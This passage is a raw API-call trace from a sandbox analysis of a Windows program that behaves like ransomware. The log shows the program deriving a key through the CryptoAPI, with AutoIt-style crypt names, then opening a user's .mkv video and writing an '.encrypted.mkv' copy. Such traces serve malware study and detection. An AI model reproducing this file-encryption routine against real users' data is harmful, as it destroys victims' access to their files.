(in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.904] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.904] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.904] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.905] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.905] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.905] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.905] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.905] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.905] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.906] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.906] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.906] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.906] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.906] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.906] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.906] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.906] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.906] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.906] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.906] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.906] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.907] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.907] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.907] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.907] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.907] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0043.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.908] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.908] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.908] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.908] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.908] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0043.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0043.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.908] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.908] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0043.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.908] CryptDestroyHash (hHash=0x7c2100) returned 1 [0043.909] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0043.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\s u.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.909] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.909] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\s u.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.910] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.910] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.910] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.910] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.910] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.910] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0043.913] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x7ea7, lpOverlapped=0x0) returned 1 [0043.913] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17ea7) returned 0xac2018 [0043.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0043.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0043.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17ea7) returned 0x935008 [0043.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.917] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0043.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.917] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17ea7) returned 0xac2018 [0043.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0043.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.918] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0043.918] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.918] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17ea7) returned 0xac2018 [0043.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0043.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0043.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0043.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0043.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0043.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0043.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0043.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17ea7) returned 0x94ceb8 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0043.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.921] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.921] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0043.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0043.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0043.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 